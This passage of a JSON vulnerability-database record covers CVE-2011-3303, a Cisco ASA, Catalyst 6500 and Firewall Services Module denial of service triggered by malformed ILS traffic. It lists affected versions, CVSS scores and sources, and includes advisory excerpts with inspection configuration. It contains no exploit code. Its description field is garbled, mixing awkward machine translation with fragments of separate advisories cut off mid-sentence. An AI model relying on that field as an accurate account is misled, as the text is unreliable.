"version": "7.2\\(2.48\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(16\\)"
},
{
"model": "asa 5500",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.4.3"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.7\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0\\(5\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(13\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(19\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(16\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(18\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.19\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(17\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(6.7\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.1.4"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(3\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.7"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(10\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(10\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.2"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(4\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(3\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.5\\(1\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(14\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1\\(2\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(6\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(11\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2.1"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(2\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.1"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.10\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.4\\(1\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.3\\(2\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.4"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.4\\(1.11\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(6\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.16\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.2"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(6\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(5\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(12\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(5\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.5"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(5\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(0\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0\\(3\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(7\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.4"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0\\(2\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0.2"
},
{
"model": "catalyst 6500",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(20\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.4\\(2\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.18\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(7\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(8\\)"
},
{
"model": "catalyst 7600",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(2\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(4\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(15\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(6\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(3\\)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "55008.0(5.7)"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 8.4(2.7)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "4.1(7)"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.4"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 7.0(8.13)"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.0"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 7.2(5.4)"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 8.0(5.25)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "3.1(21)"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.5"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "7.2"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "7.0"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 7.1"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.4"
},
{
"model": "firewall services module",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "3.2"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 8.3(2.23)"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 7.1"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.0"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.3"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "7.2"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 8.3(2.23)"
},
{
"model": "firewall services module",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "3.1"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 7.0(8.13)"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.1"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.2"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 8.4(2.7)"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 7.2(5.4)"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.3"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "3.2(22)"
},
{
"model": "firewall services module",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "4.0(16)"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.1"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 8.2(5.6)"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 8.1(2.50)"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 8.5(1.1)"
},
{
"model": "firewall services module",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "adaptive security appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "(asa) 5500 series device software 8.2(5.6)"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 8.1(2.50)"
},
{
"model": "catalyst 6500 series",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.2"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 8.5(1.1)"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "8.5"
},
{
"model": "adaptive security appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "7.0"
},
{
"model": "catalyst 6500 series",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "device software 8.0(5.25)"
},
{
"model": "database",
"scope": "eq",
"trust": 0.6,
"vendor": "ingres",
"version": "9.3"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(20)"
},
{
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.5(1.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(1.6)"
},
{
"model": "firewall services module",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(7)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(6)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(16)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(3.2)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(5.2)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(2)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0(10.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(2.13)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(3.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(5.3)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(13)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(1.2)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.23)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0(6)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0(8)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(5.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.17)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(17.2)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.25)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0(11.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(0.08)"
},
{
"model": "firewall services module",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(22)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.19)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.15)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(20)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.4(1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.4(2.7)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(1.9)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(5)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(16.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.4(2)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(4)"
},
{
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(5.4)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(2)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(3.24)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(5)"
},
{
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(2.23)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(1.1)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0(15)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(3.18)"
},
{
"model": "firewall services module",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(21)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(4.45)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(3.3)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.2)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(17.2)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(4.46)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(4.38)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2(3)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(1.1)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.4"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(5.6)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.0(4.44)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(1.7)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3(1.8)"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(4.44)"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1"
},
{
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.3"
},
{
"model": "firewall services module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1(3.11)"
},
{
"model": "firewall services module",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0(16)"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "BID",
"id": "49951"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:cisco:adaptive_security_appliance",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:catalyst_6500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:firewall_services_module",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco",
"sources": [
{
"db": "BID",
"id": "49951"
}
],
"trust": 0.3
},
"cve": "CVE-2011-3303",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2011-3303",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2011-6009",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-51248",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-3303",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2011-3303",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2011-6009",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201110-060",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-51248",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2011-3303",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "VULHUB",
"id": "VHN-51248"
},
{
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco Adaptive Security Appliances (ASA) 5500 series devices, and the ASA Services module in Cisco Catalyst 6500 series devices, with software 7.0 before 7.0(8.13), 7.1 and 7.2 before 7.2(5.4), 8.0 before 8.0(5.25), 8.1 before 8.1(2.50), 8.2 before 8.2(5.6), 8.3 before 8.3(2.23), 8.4 before 8.4(2.7), and 8.5 before 8.5(1.1) and Cisco Firewall Services Module (aka FWSM) 3.1 before 3.1(21), 3.2 before 3.2(22), 4.0 before 4.0(16), and 4.1 before 4.1(7) allow remote attackers to cause a denial of service (device reload) via malformed ILS traffic, aka Bug IDs CSCtq57697 and CSCtq57802. The problem is Bug IDs CSCtq57697 and CSCtq57802 It is a problem.Incorrect format from a third party ILS traffic Through service disruption ( Device reload ) There is a possibility of being put into a state. Multiple Cisco products are prone to multiple remote denial-of-service vulnerabilities. \nThese issues are being tracked by Cisco Bug IDs CSCtq09972, CSCtq09978, CSCtq09986, CSCtq09989, CSCtq57802. \n\nThis advisory is posted at\nhttp://www.cisco.com/warp/public/707/cisco-sa-20111005-asa.shtml. \n\nAdministrators can enable MSN IM inspection and specify actions when\na message violates a parameter, create an IM inspection policy map. \nYou can then apply the inspection policy map when you enable IM\ninspection, as shown in the following example:\n\n policy-map type inspect im MY-MSN-INSPECT\n parameters\n match protocol msn-im \n log\n !\n policy-map global_policy\n class inspection_default\n inspect im MY-MSN-INSPECT\n\nTACACS+ Authentication Bypass Vulnerability\n+------------------------------------------\n\nAn authentication bypass vulnerability affects the TACACS+\nimplementation of Cisco ASA 5500 Series Adaptive Security Appliances. You identify AAA server groups by name. \n\n class-map inspection_default\n match default-inspection-traffic\n !\n policy-map global_policy\n class inspection_default\n ... \n inspect sunrpc \n ... \n\n class-map inspection_default\n match default-inspection-traffic\n !\n policy-map global_policy\n class inspection_default\n ... \n inspect ils\n ... These vulnerabilities can be triggered by using UDP\npackets, not TCP. \n\nDo not contact psirt@cisco.com or security-alert@cisco.com for\nsoftware upgrades. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nCisco Security Advisory: Multiple Vulnerabilities in Cisco Firewall\nServices Module\n\nAdvisory ID: cisco-sa-20111005-fwsm\n\nRevision 1.0\n\nFor Public Release 2011 October 05 1600 UTC (GMT)\n\n+-------------------------------------------------------------------\n\nSummary\n=======\n\nThe Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500\nSeries switches and Cisco 7600 Series routers is affected by the\nfollowing vulnerabilities:\n\n * Syslog Message Memory Corruption Denial of Service Vulnerability\n * Authentication Proxy Denial of Service Vulnerability\n * TACACS+ Authentication Bypass Vulnerability\n * Sun Remote Procedure Call (SunRPC) Inspection Denial of Service\n Vulnerabilities\n * Internet Locator Server (ILS) Inspection Denial of Service\n Vulnerability\n\nThese vulnerabilities are not interdependent; a release that is\naffected by one vulnerability is not necessarily affected by the\nothers. \n\nCisco has released free software updates that address these\nvulnerabilities. Workarounds are available for some of the\nvulnerabilities disclosed in this advisory. Affected\nversions of Cisco FWSM Software vary depending on the specific\nvulnerability. Refer to the \"Software Version and Fixes\" section for\nspecific information on vulnerable versions. \n\nSyslog Message Memory Corruption Denial of Service Vulnerability\n+---------------------------------------------------------------\n\nDevices running vulnerable versions of Cisco FWSM Software are\naffected by this vulnerability if the following conditions are\nsatisfied:\n\n * The device has interfaces with IPv6 